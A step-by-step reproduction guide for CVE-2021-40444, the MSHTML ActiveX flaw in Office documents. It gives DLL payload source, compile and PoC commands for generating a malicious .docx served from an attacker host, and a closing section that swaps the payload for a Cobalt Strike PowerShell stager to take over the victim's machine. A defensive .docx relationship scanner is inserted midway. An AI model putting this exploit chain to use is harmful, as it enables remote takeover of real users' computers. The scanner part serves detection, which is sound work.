CVE-2021-40444 Reproduction

Introduction

Microsoft's MSHTML engine contains a code-execution vulnerability: an attacker crafts an Office document that carries a malicious ActiveX control and lures the user into opening it, achieving remote code execution. When ActiveX controls are enabled on the user's host, the attacker can take control of the victim's machine through this vulnerability.

Affected versions

Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 32-bit Systems Service Pack 2
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 32-bit Systems Service Pack 1
Windows 10 for x64-based Systems
Windows 10 32-bit Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 32-bit Systems
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 32-bit Systems

Reproducing the vulnerability

Prepare the calc.c file

#include <windows.h>
#include <stdlib.h>   /* for system() */

/* Payload used to confirm code execution: launch the calculator. */
void exec(void) {
    system("C:\\Windows\\System32\\calc.exe");
    return;
}

/* Runs when the DLL is loaded into a process; the payload fires on attach. */
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        exec();
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Compile it into a DLL

sudo apt-get install gcc-mingw-w64
i686-w64-mingw32-gcc -shared calc.c -o calc.dll

Download the PoC

Download URL: https://github.com/lockedbyte/CVE-2021-40444

Put the DLL into the test directory, replacing the file already there.

Generate the docx document from the DLL

sudo python3 exploit.py generate test/calc.dll http://<SRVIP>
# SRVIP is the server's IP address

This produces out/document.docx, word.html and word.cab.

Start the web server

sudo python3 exploit.py host 80

Upload the generated document.docx to the target machine and open it; the calculator pops up, confirming the exploit works.
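The generated document works because Word fetches remote content at load time through a relationship in the .docx package; a defender can check a file for that before it is opened. The scanner below is an added example, not part of the original write-up or of the lockedbyte PoC: it reads a .docx's word/_rels parts and flags external, non-hyperlink relationships with remote URL schemes (CVE-2021-40444 lures used an oleObject relationship targeting an mhtml:http URL), and it builds its own constructed sample documents with example.invalid as a placeholder host.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Remote URL schemes worth flagging in a relationship target. CVE-2021-40444
# lures used an oleObject relationship whose target was an mhtml:http://... URL.
REMOTE_SCHEME = re.compile(r"^(?:mhtml|https?|ftp):", re.IGNORECASE)

def find_external_targets(docx_bytes):
    """Return (rels part, relationship type, target) for every relationship in
    word/_rels/*.rels that is external, points at a remote scheme and is not an
    ordinary hyperlink (hyperlinks are common and only open on click)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".rels")):
                continue
            for rel in ET.fromstring(zf.read(name)).iter(REL_NS + "Relationship"):
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if (rel.get("TargetMode") == "External"
                        and rel_type != "hyperlink"
                        and REMOTE_SCHEME.match(target)):
                    hits.append((name, rel_type, target))
    return hits

def build_sample_docx(rels_xml):
    """Constructed minimal .docx holding only the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

OOXML = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Constructed relationship parts: a benign document (styles plus a normal
# hyperlink) and a lure-style document with an external oleObject target.
BENIGN_RELS = f"""<Relationships xmlns="{REL_NS[1:-1]}">
  <Relationship Id="rId1" Type="{OOXML}styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OOXML}hyperlink" Target="https://example.invalid/" TargetMode="External"/>
</Relationships>"""
SUSPICIOUS_RELS = f"""<Relationships xmlns="{REL_NS[1:-1]}">
  <Relationship Id="rId1" Type="{OOXML}oleObject" Target="mhtml:http://example.invalid/word.html" TargetMode="External"/>
</Relationships>"""
```

Run find_external_targets on the bytes of a real .docx to list any load-time remote fetches it would trigger; an empty list means none of the relationship parts point outside the package.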

Exploitation

What use is making the target pop a calculator? We need to find a way to actually make use of this vulnerability.

Getting a Cobalt Strike session

Start a Cobalt Strike team server on Kali

sudo ./teamserver 192.168.45.129 123456

Then open the client.

Set up a listener.

Generate a PowerShell command.

Modify calc.c, replacing the command with the generated payload, and rename it cs.c.

Compile cs.c into cs.dll.

Copy the generated cs.dll into the test directory and run the script to generate the Word document.

Start the web server

sudo python3 exploit.py host 80

Upload the generated document to the target host and open it, then click "Enable Editing".

The Cobalt Strike session comes online successfully.